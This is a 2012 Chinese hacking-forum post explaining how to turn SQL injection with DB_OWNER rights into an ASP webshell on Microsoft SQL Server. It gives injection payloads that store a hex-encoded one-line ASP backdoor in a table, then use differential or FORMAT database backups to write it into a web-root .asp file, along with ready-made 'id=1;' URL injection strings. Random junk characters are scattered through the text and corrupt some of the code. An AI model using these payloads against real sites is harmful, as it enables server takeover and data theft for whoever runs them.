找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2167|回复: 0
打印 上一主题 下一主题

DB_OWNER权限得到webshell的改进办法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 21:31:07 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
DB_OWNER权限得到webshell的两点改进:0 T6 z: s) j! r9 H7 b

. M3 z' m  J( E- g/ K减少备份文件大小,得到可执行的webshell成功率提高不少6 C2 p1 I$ K0 z0 Z: R
一利用差异备份
# B, w8 ^7 `  J; b$ w& |加一个参数WITH DIFFERENTIAL
% x1 K. m  p; O
- B: d% p( m" _1
( C9 O. f! X6 D8 z( W2
4 ^, x! Y- w3 V: ~( H3( F2 D# M1 h8 m, z& d' C& Y
49 Y1 T' G& Q3 d4 j- X- l
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s8 ^4 s6 m" n! G2 \
create table [dbo].[xiaolu] ([cmd] [image]);# j& f( y8 a( K9 f6 C
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)' f% y& ^3 d5 t  Z8 N8 x
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL * N: ^5 b6 U6 V$ `; ]
: a* G4 L5 |' m* w( c  k# ]' s8 a
二利用完全FORMAT( h! S4 N) I; @7 n, f  v, D4 k
加一个参数WITH FROMAT5 V  f" j( O& L( v& d3 g% A" Z
有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以+ U4 J6 M  t+ A: X( o- o6 \1 P

/ z: o5 p; y" Q' y' @17 C  |3 ?9 K) l; x- {! m& U7 e
2- G& A/ j0 R+ g
3/ p! H& g3 Z; ]( e" |8 t# g  I$ \9 j
4" s3 ^6 n* \4 ^8 H) H" s+ Y0 P
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
" U- A1 v3 l5 D  P: i8 j2 Ocreate table [dbo].[xiaolu] ([cmd] [image]);
( B! W" D- Z! B) ]3 qinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
% K% ?6 Q% F3 i* u( @3 O" r$ ~declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
/ E7 N2 t, }0 o# o8 U% J2 h6 B* s$ S, B
总的来说就是那么简单几句,下面以备份数据库model为例子/ x+ @0 J* ^+ t2 z4 A- J% t) P( v- O
1
  T) D, f; O- }, y! V5 S6 R+ E  s+ H; s
15 W8 b0 Y4 d2 \1 L1 j3 D. S8 a
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
( e+ B1 s, N) c. ?2 v/ w# o* U
- i6 P" _1 W2 k5 V" }/ M9 g( D' W22 _  M( N- D( N: d' S
: B1 X) P( F+ c7 _) m6 S
1
9 I( a  W7 u4 A% J* g0 X id=1;backup database model to disk='你的路径‘ with differential,format;--
" M- N; Z6 s# i4 s) k+ u, `
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表